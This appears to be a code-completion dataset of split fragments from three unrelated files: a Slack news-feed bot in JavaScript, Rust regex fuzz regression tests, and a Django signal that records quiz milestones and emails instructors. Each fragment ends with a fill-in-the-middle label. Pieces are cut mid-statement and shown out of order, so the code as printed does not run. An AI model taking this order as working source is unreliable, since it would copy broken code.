"value":219
},
{
"text":"250 - Achmea Transport",
"value":250
},
{
"text":"251 - Achmea Automotive",
"value":251
},
{
"text":"253 - Achmea Innovation",
"value":253
}
]
}
]
}
if (req.body.host) {
attachment.author_name = req.body.host;
attachment.author_link = `http://${req.body.host}`;
}
if (req.body.summary) {
attachment.text = req.body.summary
}
if (req.body.image_url) {
attachment.image_url = req.body.image_url
}
if (req.body.pub_date) {
attachment.ts = Date.parse(req.body.pub_date) / 1000
}
// Populating fields
var fields = []
if (req.body.keywords) {
if (!req.body.keywords.includes(", ")) {
req.body.keywords = req.body.keywords.replace(/,/g, ", ")
}
fields.push({
title: "Keywords",
short: false,
value: req.body.keywords
})
}
if (req.body.companies) {
if (!req.body.companies.includes(", ")) {
req.body.companies = req.body.companies.replace(/,/g, ", ")
}
fields.push({
title: "Companies",
short: false,
value: req.body.companies
})
}
if (req.body.word_count) {
var length = req.body.word_count
var prefix = ""
if (length > 1000 )
prefix = ":snail: "
else if (length < 300)
prefix = ":fast_forward: "
fields.push({
title: "Length",
short: true,
value: `${prefix}${length} words`
})
}
if (req.body.shares) {
fields.push({
title: "Shares",
short: true,
value: formatCount(req.body.shares)
})
}
if (req.body.sentiment) {
var sentiment
switch (req.body.sentiment) {
case "negative":
sentiment = ":rage: Negative";
break;
case "positive":
sentiment = ":smile: Positive";
break;
case "neutral":
sentiment = "Neutral"
break;
}
fields.push({
title: "Sentiment",
short: true,
value: sentiment
})
}
// Unsupported for now
// fields.push({
// "title": "Sponsored",
// "value": ":warning: Undetected",
// "short": true
// })
attachment.fields = fields
slackAPIClient.send('chat.postMessage',
{
channel,
attachments: [attachment]
},
(err, response) => {
if (err) {
console.log(err)
res.status(500).send(err)
} else {
res.status(201).send(response)
}
}
)
}
)
slapp.command('/feeds', 'list', (msg, text) => {
ncClient.list().then (feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`*Here is the list of all feeds:*\n${lines.join("\n")}`)
})
})
slapp.command('/feeds', /connect (\d+)/, (msg, text, id) => {
msg.respond(`To connect a feed to this channel, please just put the id (${id}) as the channel topic (at the top)`)
})
slapp.command('/feeds', 'create (.+)', (msg, text, name) => {
ncClient.create(name).then(() => {
return ncClient.list()
}).then(feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`:white_check_mark: Successfully created feed ${name}, here is the list of all feeds:\n${lines.join("\n")}`)
}).catch(() => {
msg.respond("Error creating feed")
})
})
slapp.command('/feeds', 'add (.+)', (msg, text, url) => {
getConnectedFeedId(msg.meta.channel_id).then(feedId => {
return new Promise ((resolve, reject) => {
ncClient.add(feedId, url).then(() => { resolve(feedId)}).catch(e => { reject(e)})
})
	}).then(feedId => {
		return ncClient.listSources(feedId)
}).then(result => {
var lines = result.sources.map(source => {
if (source.source.type == 'rss') {
return `RSS: ${source.source.url}`
} else if (source.source.type =='search') {
return `Search: "${source.source.keywords}"`
} else if (source.source.type == 'channel') {
return `Channel: ${source.source.id}. ${source.source.name}`
}
})
msg.respond(`:white_check_mark: Successfully added source ${url}, here is the list of all sources in the feed now:\n${lines.join("\n")}`)
}).catch((e) => {
console.log(e)
msg.respond("Error adding source")
})
})
slapp.command('/feeds', 'sources', (msg, text) => {
getConnectedFeedId(msg.meta.channel_id).then(feedId => {
return ncClient.listSources(feedId)
}).then(sources => {
var lines = sources.map(source => {
if (source.source.type == 'rss') {
return `RSS: ${source.source.url}`
} else if (source.source.type =='search') {
return `Search: "${source.source.keywords}"`
} else if (source.source.type == 'channel') {
return `Channel: ${source.source.id}. ${source.source.name}`
}
})
msg.respond(`*Here is a list of all sources in the current feed:*\n${lines.join("\n")}`)
})
})
slapp.command('/feeds', '(help)?', (msg, text) => {
msg.respond(`Valid commands: \`list\`, \`connect\`, \`create\`, \`add\`, \`sources\`, \`help\`.
To show the currently connected feed: \`/feeds\`
To list all available feeds: \`/feeds list\`
To connect a feed to this channel: \`/feeds connect <id>\` (Take ID from /feeds list)
To create and connect a new feed: \`/feeds create <name>\`
To add an RSS source to the connected feed: \`/feeds add <url>\`
To list the sources in the connected feed: \`/feeds sources\``)
})
slapp.action('share', 'post', (msg, value) => {
var sharedInChannel = true
if (!value) {
sharedInChannel = false
value = msg.body.actions[0].selected_options[0].value
}
var url = msg.body.original_message.attachments[0].title_link
var userId = msg.body.user.id
var originalMsg = msg.body.original_message;
var chosenAttachment = originalMsg.attachments[msg.body.attachment_id - 1]
addUrlToChannel(value, url)
.then(() => {
var attachment = {
color: '#006600',
text: `${url}
:postbox: Article posted to channel ${value} by <@${userId}>`
}
originalMsg.attachments = []
if (!sharedInChannel) {
originalMsg.attachments.push(chosenAttachment)
}
originalMsg.attachments.push(attachment)
msg.respond(msg.body.response_url, originalMsg)
})
.catch((err) => {
console.log(err)
chosenAttachment.color = '#ff9933'
var lastAttachment = {
pretext: `:exclamation: Error posting article to channel ${value}`
}
originalMsg.attachments = [chosenAttachment, lastAttachment]
msg.respond(msg.body.response_url, originalMsg)
})
})
function getConnectedFeedId(channelId) | {
return new Promise((resolve, reject) => {
slackAPIClient.send('channels.info',
{
channel: channelId
},
(err, response) => {
if (err) return reject(err)
resolve(response.channel.topic.value)
}
)
})
} | identifier_body |
|
server.js | var verifiedIcon = req.body.verified ? "https://cdn3.iconfinder.com/data/icons/basicolor-arrows-checks/24/154_check_ok_sticker_success-512.png" : "http://www.clker.com/cliparts/H/Z/0/R/f/S/warning-icon-hi.png"
var attachment = {
callback_id: "share",
author_icon: verifiedIcon,
title_link: req.body.url,
title: req.body.title,
actions: [
{
"name": "post",
"text": "Post",
"type": "button",
"style": "primary",
"value": channelId
},
{
"name": "discard",
"text": "Discard",
"type": "button",
"style": "danger",
"value": "discarded"
},
{
"name": "post",
"text": "Share to channel...",
"type": "select",
"options": [
{
"text":"1 - Test",
"value":1
},
{
"text":"7 - Digital Marketing",
"value":7
},
{
"text":"40 - Legal",
"value":40
},
{
"text":"43 - Innovation & Startups",
"value":43
},
{
"text":"66 - Journalism",
"value":66
},
{
"text":"76 - Ondernemen",
"value":76
},
{
"text":"82 - Market Trends",
"value":82
},
{
"text":"83 - 9x Awesome Content",
"value":83
},
{
"text":"84 - Business Practices",
"value":84
},
{
"text":"86 - Education Market",
"value":86
},
{
"text":"87 - Venture Capital & Startups",
"value":87
},
{
"text":"89 - Fintech",
"value":89
},
{
"text":"101 - Direct Marketing",
"value":101
},
{
"text":"109 - IT Business",
"value":109
},
{
"text":"116 - NN Algemeen",
"value":116
},
{
"text":"120 - Customer Insights",
"value":120
},
{
"text":"125 - CPS",
"value":125
},
{
"text":"126 - RMS",
"value":126
},
{
"text":"136 - IBM in the Media",
"value":136
},
{
"text":"151 - Randstad in the News",
"value":151
},
{
"text":"152 - Randstad Market Watch",
"value":152
},
{
"text":"170 - IBM Cloud Market Watch",
"value":170
},
{
"text":"219 - IBM Developer Advocates",
"value":219
},
{
"text":"250 - Achmea Transport",
"value":250
},
{
"text":"251 - Achmea Automotive",
"value":251
},
{
"text":"253 - Achmea Innovation",
"value":253
}
]
}
]
}
if (req.body.host) {
attachment.author_name = req.body.host;
attachment.author_link = `http://${req.body.host}`;
}
if (req.body.summary) {
attachment.text = req.body.summary
}
if (req.body.image_url) {
attachment.image_url = req.body.image_url
}
if (req.body.pub_date) {
attachment.ts = Date.parse(req.body.pub_date) / 1000
}
// Populating fields
var fields = []
if (req.body.keywords) {
if (!req.body.keywords.includes(", ")) {
req.body.keywords = req.body.keywords.replace(/,/g, ", ")
}
fields.push({
title: "Keywords",
short: false,
value: req.body.keywords
})
}
if (req.body.companies) {
if (!req.body.companies.includes(", ")) {
req.body.companies = req.body.companies.replace(/,/g, ", ")
}
fields.push({
title: "Companies",
short: false,
value: req.body.companies
})
}
if (req.body.word_count) {
var length = req.body.word_count
var prefix = ""
if (length > 1000 )
prefix = ":snail: "
else if (length < 300)
prefix = ":fast_forward: "
fields.push({
title: "Length",
short: true,
value: `${prefix}${length} words`
})
}
if (req.body.shares) {
fields.push({
title: "Shares",
short: true,
value: formatCount(req.body.shares)
})
}
if (req.body.sentiment) {
var sentiment
switch (req.body.sentiment) {
case "negative":
sentiment = ":rage: Negative";
break;
case "positive":
sentiment = ":smile: Positive";
break;
case "neutral":
sentiment = "Neutral"
break;
}
fields.push({
title: "Sentiment",
short: true,
value: sentiment
})
}
// Unsupported for now
// fields.push({
// "title": "Sponsored",
// "value": ":warning: Undetected",
// "short": true
// })
attachment.fields = fields
slackAPIClient.send('chat.postMessage',
{
channel,
attachments: [attachment]
},
(err, response) => {
if (err) {
console.log(err)
res.status(500).send(err)
} else {
res.status(201).send(response)
}
}
)
}
)
slapp.command('/feeds', 'list', (msg, text) => {
ncClient.list().then (feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`*Here is the list of all feeds:*\n${lines.join("\n")}`)
})
})
slapp.command('/feeds', /connect (\d+)/, (msg, text, id) => {
msg.respond(`To connect a feed to this channel, please just put the id (${id}) as the channel topic (at the top)`)
})
slapp.command('/feeds', 'create (.+)', (msg, text, name) => {
ncClient.create(name).then(() => {
return ncClient.list()
}).then(feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`:white_check_mark: Successfully created feed ${name}, here is the list of all feeds:\n${lines.join("\n")}`)
}).catch(() => {
msg.respond("Error creating feed")
})
})
slapp.command('/feeds', 'add (.+)', (msg, text, url) => {
getConnectedFeedId(msg.meta.channel_id).then(feedId => {
return new Promise ((resolve, reject) => {
ncClient.add(feedId, url).then(() => { resolve(feedId)}).catch(e => { reject(e)})
})
	}).then(feedId => {
		return ncClient.listSources(feedId)
}).then(result => {
var lines = result.sources.map(source => {
if (source.source.type == 'rss') {
return `RSS: ${source.source.url}`
} else if (source.source.type =='search') {
return `Search: "${source.source.keywords}"`
} else if (source.source.type == 'channel') {
return `Channel: ${source.source.id}. ${source.source.name}`
}
})
msg.respond(`:white_check_mark: Successfully added source ${url}, here is the list of all sources in the feed now:\n${lines.join("\n")}`)
}).catch | random_line_split |
||
server.js | ",
"value": channelId
},
{
"name": "discard",
"text": "Discard",
"type": "button",
"style": "danger",
"value": "discarded"
},
{
"name": "post",
"text": "Share to channel...",
"type": "select",
"options": [
{
"text":"1 - Test",
"value":1
},
{
"text":"7 - Digital Marketing",
"value":7
},
{
"text":"40 - Legal",
"value":40
},
{
"text":"43 - Innovation & Startups",
"value":43
},
{
"text":"66 - Journalism",
"value":66
},
{
"text":"76 - Ondernemen",
"value":76
},
{
"text":"82 - Market Trends",
"value":82
},
{
"text":"83 - 9x Awesome Content",
"value":83
},
{
"text":"84 - Business Practices",
"value":84
},
{
"text":"86 - Education Market",
"value":86
},
{
"text":"87 - Venture Capital & Startups",
"value":87
},
{
"text":"89 - Fintech",
"value":89
},
{
"text":"101 - Direct Marketing",
"value":101
},
{
"text":"109 - IT Business",
"value":109
},
{
"text":"116 - NN Algemeen",
"value":116
},
{
"text":"120 - Customer Insights",
"value":120
},
{
"text":"125 - CPS",
"value":125
},
{
"text":"126 - RMS",
"value":126
},
{
"text":"136 - IBM in the Media",
"value":136
},
{
"text":"151 - Randstad in the News",
"value":151
},
{
"text":"152 - Randstad Market Watch",
"value":152
},
{
"text":"170 - IBM Cloud Market Watch",
"value":170
},
{
"text":"219 - IBM Developer Advocates",
"value":219
},
{
"text":"250 - Achmea Transport",
"value":250
},
{
"text":"251 - Achmea Automotive",
"value":251
},
{
"text":"253 - Achmea Innovation",
"value":253
}
]
}
]
}
if (req.body.host) {
attachment.author_name = req.body.host;
attachment.author_link = `http://${req.body.host}`;
}
if (req.body.summary) {
attachment.text = req.body.summary
}
if (req.body.image_url) {
attachment.image_url = req.body.image_url
}
if (req.body.pub_date) {
attachment.ts = Date.parse(req.body.pub_date) / 1000
}
// Populating fields
var fields = []
if (req.body.keywords) {
if (!req.body.keywords.includes(", ")) {
req.body.keywords = req.body.keywords.replace(/,/g, ", ")
}
fields.push({
title: "Keywords",
short: false,
value: req.body.keywords
})
}
if (req.body.companies) {
if (!req.body.companies.includes(", ")) {
req.body.companies = req.body.companies.replace(/,/g, ", ")
}
fields.push({
title: "Companies",
short: false,
value: req.body.companies
})
}
if (req.body.word_count) {
var length = req.body.word_count
var prefix = ""
if (length > 1000 )
prefix = ":snail: "
else if (length < 300)
prefix = ":fast_forward: "
fields.push({
title: "Length",
short: true,
value: `${prefix}${length} words`
})
}
if (req.body.shares) {
fields.push({
title: "Shares",
short: true,
value: formatCount(req.body.shares)
})
}
if (req.body.sentiment) {
var sentiment
switch (req.body.sentiment) {
case "negative":
sentiment = ":rage: Negative";
break;
case "positive":
sentiment = ":smile: Positive";
break;
case "neutral":
sentiment = "Neutral"
break;
}
fields.push({
title: "Sentiment",
short: true,
value: sentiment
})
}
// Unsupported for now
// fields.push({
// "title": "Sponsored",
// "value": ":warning: Undetected",
// "short": true
// })
attachment.fields = fields
slackAPIClient.send('chat.postMessage',
{
channel,
attachments: [attachment]
},
(err, response) => {
if (err) {
console.log(err)
res.status(500).send(err)
} else {
res.status(201).send(response)
}
}
)
}
)
slapp.command('/feeds', 'list', (msg, text) => {
ncClient.list().then (feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`*Here is the list of all feeds:*\n${lines.join("\n")}`)
})
})
slapp.command('/feeds', /connect (\d+)/, (msg, text, id) => {
msg.respond(`To connect a feed to this channel, please just put the id (${id}) as the channel topic (at the top)`)
})
slapp.command('/feeds', 'create (.+)', (msg, text, name) => {
ncClient.create(name).then(() => {
return ncClient.list()
}).then(feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`:white_check_mark: Successfully created feed ${name}, here is the list of all feeds:\n${lines.join("\n")}`)
}).catch(() => {
msg.respond("Error creating feed")
})
})
slapp.command('/feeds', 'add (.+)', (msg, text, url) => {
getConnectedFeedId(msg.meta.channel_id).then(feedId => {
return new Promise ((resolve, reject) => {
ncClient.add(feedId, url).then(() => { resolve(feedId)}).catch(e => { reject(e)})
})
	}).then(feedId => {
		return ncClient.listSources(feedId)
}).then(result => {
var lines = result.sources.map(source => {
if (source.source.type == 'rss') {
return `RSS: ${source.source.url}`
} else if (source.source.type =='search') {
return `Search: "${source.source.keywords}"`
} else if (source.source.type == 'channel') {
return `Channel: ${source.source.id}. ${source.source.name}`
}
})
msg.respond(`:white_check_mark: Successfully added source ${url}, here is the list of all sources in the feed now:\n${lines.join("\n")}`)
}).catch((e) => {
console.log(e)
msg.respond("Error adding source")
})
})
slapp.command('/feeds', 'sources', (msg, text) => {
getConnectedFeedId(msg.meta.channel_id).then(feedId => {
return ncClient.listSources(feedId)
}).then(sources => {
var lines = sources.map(source => {
if (source.source.type == 'rss') {
return `RSS: ${source.source.url}`
} else if (source.source.type =='search') | else if (source.source.type == 'channel') {
| {
return `Search: "${source.source.keywords}"`
} | conditional_block |
regression_fuzz.rs | // These tests are only run for the "default" test target because some of them
// can take quite a long time. Some of them take long enough that it's not
// practical to run them in debug mode. :-/
// See: https://oss-fuzz.com/testcase-detail/5673225499181056
//
// Ignored by default since it takes too long in debug mode (almost a minute).
#[test]
#[ignore]
fn fuzz1() |
// See: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26505
// See: https://github.com/rust-lang/regex/issues/722
#[test]
fn empty_any_errors_no_panic() {
assert!(regex_new!(r"\P{any}").is_err());
}
// This tests that a very large regex errors during compilation instead of
// using gratuitous amounts of memory. The specific problem is that the
// compiler wasn't accounting for the memory used by Unicode character classes
// correctly.
//
// See: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=33579
#[test]
fn big_regex_fails_to_compile() {
let pat = "[\u{0}\u{e}\u{2}\\w~~>[l\t\u{0}]p?<]{971158}";
assert!(regex_new!(pat).is_err());
}
| {
regex!(r"1}{55}{0}*{1}{55}{55}{5}*{1}{55}+{56}|;**");
} | identifier_body |
regression_fuzz.rs | // These tests are only run for the "default" test target because some of them
// can take quite a long time. Some of them take long enough that it's not
// practical to run them in debug mode. :-/ | #[test]
#[ignore]
fn fuzz1() {
regex!(r"1}{55}{0}*{1}{55}{55}{5}*{1}{55}+{56}|;**");
}
// See: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26505
// See: https://github.com/rust-lang/regex/issues/722
#[test]
fn empty_any_errors_no_panic() {
assert!(regex_new!(r"\P{any}").is_err());
}
// This tests that a very large regex errors during compilation instead of
// using gratuitous amounts of memory. The specific problem is that the
// compiler wasn't accounting for the memory used by Unicode character classes
// correctly.
//
// See: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=33579
#[test]
fn big_regex_fails_to_compile() {
let pat = "[\u{0}\u{e}\u{2}\\w~~>[l\t\u{0}]p?<]{971158}";
assert!(regex_new!(pat).is_err());
} |
// See: https://oss-fuzz.com/testcase-detail/5673225499181056
//
// Ignored by default since it takes too long in debug mode (almost a minute). | random_line_split |
regression_fuzz.rs | // These tests are only run for the "default" test target because some of them
// can take quite a long time. Some of them take long enough that it's not
// practical to run them in debug mode. :-/
// See: https://oss-fuzz.com/testcase-detail/5673225499181056
//
// Ignored by default since it takes too long in debug mode (almost a minute).
#[test]
#[ignore]
fn | () {
regex!(r"1}{55}{0}*{1}{55}{55}{5}*{1}{55}+{56}|;**");
}
// See: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=26505
// See: https://github.com/rust-lang/regex/issues/722
#[test]
fn empty_any_errors_no_panic() {
assert!(regex_new!(r"\P{any}").is_err());
}
// This tests that a very large regex errors during compilation instead of
// using gratuitous amounts of memory. The specific problem is that the
// compiler wasn't accounting for the memory used by Unicode character classes
// correctly.
//
// See: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=33579
#[test]
fn big_regex_fails_to_compile() {
let pat = "[\u{0}\u{e}\u{2}\\w~~>[l\t\u{0}]p?<]{971158}";
assert!(regex_new!(pat).is_err());
}
| fuzz1 | identifier_name |
signals.py | """
Django signals for the app.
"""
import logging
from django.db.models.signals import post_save
from django.conf import settings
from django.contrib.sites.models import Site
from .models import Response, UnitLesson
from .ct_util import get_middle_indexes
from core.common.mongo import c_milestone_orct
from core.common.utils import send_email, suspending_receiver
log = logging.getLogger(__name__)
@suspending_receiver(post_save, sender=Response)
def run_courselet_notif_flow(sender, instance, **kwargs):
# TODO: add check that Response has a text, as an obj can be created before a student submits
# TODO: exclude self eval submissions other than a response submission (e.g. "just guessing")
| questions = unit_lesson.unit.all_orct()
i = [_[0] for _ in questions.values_list('id')].index(unit_lesson_id)
if i == 0:
milestone = "first"
elif i == len(questions) - 1:
milestone = "last"
elif i in get_middle_indexes(questions):
milestone = "middle" # TODO consider returning a single number
# If milestone, store the record
if milestone:
to_save = {
"milestone": milestone,
"lesson_title": lesson.title if lesson else None,
"lesson_id": lesson_id,
"unit_lesson_id": unit_lesson_id,
"course_title": course.title if course else None,
"course_id": course_id,
"student_username": student.username if student else None,
"student_id": student_id,
# "datetime": datetime.datetime.now() # TODO: consider changing to UTC (and making it a timestamp)
}
# Do not store if such `student_id`-`lesson_id` row is already present
milestone_orct_answers_cursor = c_milestone_orct(use_secondary=False).find({
"milestone": milestone,
"lesson_id": lesson_id
})
initial_milestone_orct_answers_number = milestone_orct_answers_cursor.count()
milestone_orct_answers = (a for a in milestone_orct_answers_cursor)
already_exists = False
for answer in milestone_orct_answers:
if answer.get("student_id") == student_id:
already_exists = True
break
if not already_exists:
c_milestone_orct(use_secondary=False).save(to_save)
milestone_orct_answers_number = initial_milestone_orct_answers_number + 1
# If N students responded to a milestone question, send an email.
# The threshold holds for each milestone separately.
if milestone_orct_answers_number == settings.MILESTONE_ORCT_NUMBER:
context_data = {
"milestone": milestone,
"students_number": milestone_orct_answers_number,
"course_title": course.title if course else None,
"lesson_title": lesson.title if lesson else None,
"current_site": Site.objects.get_current(),
"course_id": course_id,
"unit_lesson_id": unit_lesson_id,
"courselet_pk": unit_lesson.unit.id if unit_lesson.unit else None
} # pragma: no cover
log.info("""Courselet notification with data:
Course title - {course_title},
Lesson title - {lesson_title},
Students number - {students_number},
Unit lesson id - {unit_lesson_id},
Course id - {course_id},
Milestone - {milestone}
""".format(**context_data)) # pragma: no cover
send_email(
context_data=context_data,
from_email=settings.EMAIL_FROM,
to_email=[instructor.email for instructor in instructors],
template_subject="ct/email/milestone_ortc_notify_subject",
template_text="ct/email/milestone_ortc_notify_text"
)
| if (instance.kind == Response.ORCT_RESPONSE and not
(instance.unitLesson.kind == UnitLesson.RESOLVES or
instance.is_test or instance.is_preview or not instance.unitLesson.order)):
course = instance.course
course_id = course.id if course else None
instructors = course.get_users(role="prof")
lesson = instance.lesson
lesson_id = lesson.id if lesson else None
student = instance.author
student_id = student.id if student else None
unit_lesson = instance.unitLesson
unit_lesson_id = unit_lesson.id if unit_lesson else None # it's a thread
# Exclude instructors, e.g. the ones submitting in preview mode
for instructor in instructors:
if student_id == instructor.id:
return
# Define if it's a milestone question (either first, middle, or last)
milestone = None | identifier_body |
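# Hedged sketch (added, not part of signals.py): the first/middle/last
# classification used above, factored out for illustration. The real
# get_middle_indexes lives in ct_util and is not shown in this excerpt;
# the [2] below is an assumed return value for five questions.
def _classify_milestone(index, n_questions, middle_indexes):
    if index == 0:
        return "first"
    if index == n_questions - 1:
        return "last"
    if index in middle_indexes:
        return "middle"
    return None

assert _classify_milestone(0, 5, [2]) == "first"
assert _classify_milestone(2, 5, [2]) == "middle"
assert _classify_milestone(4, 5, [2]) == "last"
assert _classify_milestone(1, 5, [2]) is None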
signals.py | """
Django signals for the app.
"""
import logging
from django.db.models.signals import post_save
from django.conf import settings
from django.contrib.sites.models import Site
from .models import Response, UnitLesson
from .ct_util import get_middle_indexes
from core.common.mongo import c_milestone_orct
from core.common.utils import send_email, suspending_receiver
log = logging.getLogger(__name__)
@suspending_receiver(post_save, sender=Response)
def run_courselet_notif_flow(sender, instance, **kwargs):
# TODO: add check that Response has a text, as an obj can be created before a student submits
# TODO: exclude self eval submissions other than a response submission (e.g. "just guessing")
if (instance.kind == Response.ORCT_RESPONSE and not
(instance.unitLesson.kind == UnitLesson.RESOLVES or
instance.is_test or instance.is_preview or not instance.unitLesson.order)):
course = instance.course
course_id = course.id if course else None
instructors = course.get_users(role="prof")
lesson = instance.lesson
lesson_id = lesson.id if lesson else None
student = instance.author
student_id = student.id if student else None
unit_lesson = instance.unitLesson
unit_lesson_id = unit_lesson.id if unit_lesson else None # it's a thread
# Exclude instructors, e.g. the ones submitting in preview mode
for instructor in instructors:
|
# Define if it's a milestone question (either first, middle, or last)
milestone = None
questions = unit_lesson.unit.all_orct()
i = [_[0] for _ in questions.values_list('id')].index(unit_lesson_id)
if i == 0:
milestone = "first"
elif i == len(questions) - 1:
milestone = "last"
elif i in get_middle_indexes(questions):
milestone = "middle" # TODO consider returning a single number
# If milestone, store the record
if milestone:
to_save = {
"milestone": milestone,
"lesson_title": lesson.title if lesson else None,
"lesson_id": lesson_id,
"unit_lesson_id": unit_lesson_id,
"course_title": course.title if course else None,
"course_id": course_id,
"student_username": student.username if student else None,
"student_id": student_id,
# "datetime": datetime.datetime.now() # TODO: consider changing to UTC (and making it a timestamp)
}
# Do not store if such `student_id`-`lesson_id` row is already present
milestone_orct_answers_cursor = c_milestone_orct(use_secondary=False).find({
"milestone": milestone,
"lesson_id": lesson_id
})
initial_milestone_orct_answers_number = milestone_orct_answers_cursor.count()
milestone_orct_answers = (a for a in milestone_orct_answers_cursor)
already_exists = False
for answer in milestone_orct_answers:
if answer.get("student_id") == student_id:
already_exists = True
break
if not already_exists:
c_milestone_orct(use_secondary=False).save(to_save)
milestone_orct_answers_number = initial_milestone_orct_answers_number + 1
# If N students responded to a milestone question, send an email.
# The threshold holds for each milestone separately.
if milestone_orct_answers_number == settings.MILESTONE_ORCT_NUMBER:
context_data = {
"milestone": milestone,
"students_number": milestone_orct_answers_number,
"course_title": course.title if course else None,
"lesson_title": lesson.title if lesson else None,
"current_site": Site.objects.get_current(),
"course_id": course_id,
"unit_lesson_id": unit_lesson_id,
"courselet_pk": unit_lesson.unit.id if unit_lesson.unit else None
} # pragma: no cover
log.info("""Courselet notification with data:
Course title - {course_title},
Lesson title - {lesson_title},
Students number - {students_number},
Unit lesson id - {unit_lesson_id},
Course id - {course_id},
Milestone - {milestone}
""".format(**context_data)) # pragma: no cover
send_email(
context_data=context_data,
from_email=settings.EMAIL_FROM,
to_email=[instructor.email for instructor in instructors],
template_subject="ct/email/milestone_ortc_notify_subject",
template_text="ct/email/milestone_ortc_notify_text"
)
| if student_id == instructor.id:
return | conditional_block |
signals.py | """
Django signals for the app.
"""
import logging
from django.db.models.signals import post_save
from django.conf import settings
from django.contrib.sites.models import Site
from .models import Response, UnitLesson
from .ct_util import get_middle_indexes
from core.common.mongo import c_milestone_orct
from core.common.utils import send_email, suspending_receiver
log = logging.getLogger(__name__)
@suspending_receiver(post_save, sender=Response)
def | (sender, instance, **kwargs):
# TODO: add check that Response has a text, as an obj can be created before a student submits
# TODO: exclude self eval submissions other than a response submission (e.g. "just guessing")
if (instance.kind == Response.ORCT_RESPONSE and not
(instance.unitLesson.kind == UnitLesson.RESOLVES or
instance.is_test or instance.is_preview or not instance.unitLesson.order)):
course = instance.course
course_id = course.id if course else None
instructors = course.get_users(role="prof")
lesson = instance.lesson
lesson_id = lesson.id if lesson else None
student = instance.author
student_id = student.id if student else None
unit_lesson = instance.unitLesson
unit_lesson_id = unit_lesson.id if unit_lesson else None # it's a thread
# Exclude instructors, e.g. the ones submitting in preview mode
for instructor in instructors:
if student_id == instructor.id:
return
# Define if it's a milestone question (either first, middle, or last)
milestone = None
questions = unit_lesson.unit.all_orct()
i = [_[0] for _ in questions.values_list('id')].index(unit_lesson_id)
if i == 0:
milestone = "first"
elif i == len(questions) - 1:
milestone = "last"
elif i in get_middle_indexes(questions):
milestone = "middle" # TODO consider returning a single number
# If milestone, store the record
if milestone:
to_save = {
"milestone": milestone,
"lesson_title": lesson.title if lesson else None,
"lesson_id": lesson_id,
"unit_lesson_id": unit_lesson_id,
"course_title": course.title if course else None,
"course_id": course_id,
"student_username": student.username if student else None,
"student_id": student_id,
# "datetime": datetime.datetime.now() # TODO: consider changing to UTC (and making it a timestamp)
}
# Do not store if such `student_id`-`lesson_id` row is already present
milestone_orct_answers_cursor = c_milestone_orct(use_secondary=False).find({
"milestone": milestone,
"lesson_id": lesson_id
})
initial_milestone_orct_answers_number = milestone_orct_answers_cursor.count()
milestone_orct_answers = (a for a in milestone_orct_answers_cursor)
already_exists = False
for answer in milestone_orct_answers:
if answer.get("student_id") == student_id:
already_exists = True
break
if not already_exists:
c_milestone_orct(use_secondary=False).save(to_save)
milestone_orct_answers_number = initial_milestone_orct_answers_number + 1
# If N students responded to a milestone question, send an email.
# The threshold holds for each milestone separately.
if milestone_orct_answers_number == settings.MILESTONE_ORCT_NUMBER:
context_data = {
"milestone": milestone,
"students_number": milestone_orct_answers_number,
"course_title": course.title if course else None,
"lesson_title": lesson.title if lesson else None,
"current_site": Site.objects.get_current(),
"course_id": course_id,
"unit_lesson_id": unit_lesson_id,
"courselet_pk": unit_lesson.unit.id if unit_lesson.unit else None
} # pragma: no cover
log.info("""Courselet notification with data:
Course title - {course_title},
Lesson title - {lesson_title},
Students number - {students_number},
Unit lesson id - {unit_lesson_id},
Course id - {course_id},
Milestone - {milestone}
""".format(**context_data)) # pragma: no cover
send_email(
context_data=context_data,
from_email=settings.EMAIL_FROM,
to_email=[instructor.email for instructor in instructors],
template_subject="ct/email/milestone_ortc_notify_subject",
template_text="ct/email/milestone_ortc_notify_text"
)
| run_courselet_notif_flow | identifier_name |
signals.py | """
Django signals for the app.
"""
import logging | from django.db.models.signals import post_save
from django.conf import settings
from django.contrib.sites.models import Site
from .models import Response, UnitLesson
from .ct_util import get_middle_indexes
from core.common.mongo import c_milestone_orct
from core.common.utils import send_email, suspending_receiver
log = logging.getLogger(__name__)
@suspending_receiver(post_save, sender=Response)
def run_courselet_notif_flow(sender, instance, **kwargs):
# TODO: add check that Response has a text, as an obj can be created before a student submits
# TODO: exclude self eval submissions other than a response submission (e.g. "just guessing")
if (instance.kind == Response.ORCT_RESPONSE and not
(instance.unitLesson.kind == UnitLesson.RESOLVES or
instance.is_test or instance.is_preview or not instance.unitLesson.order)):
course = instance.course
course_id = course.id if course else None
instructors = course.get_users(role="prof")
lesson = instance.lesson
lesson_id = lesson.id if lesson else None
student = instance.author
student_id = student.id if student else None
unit_lesson = instance.unitLesson
unit_lesson_id = unit_lesson.id if unit_lesson else None # it's a thread
# Exclude instructors, e.g. the ones submitting in preview mode
for instructor in instructors:
if student_id == instructor.id:
return
# Define if it's a milestone question (either first, middle, or last)
milestone = None
questions = unit_lesson.unit.all_orct()
i = [_[0] for _ in questions.values_list('id')].index(unit_lesson_id)
if i == 0:
milestone = "first"
elif i == len(questions) - 1:
milestone = "last"
elif i in get_middle_indexes(questions):
milestone = "middle" # TODO consider returning a single number
# If milestone, store the record
if milestone:
to_save = {
"milestone": milestone,
"lesson_title": lesson.title if lesson else None,
"lesson_id": lesson_id,
"unit_lesson_id": unit_lesson_id,
"course_title": course.title if course else None,
"course_id": course_id,
"student_username": student.username if student else None,
"student_id": student_id,
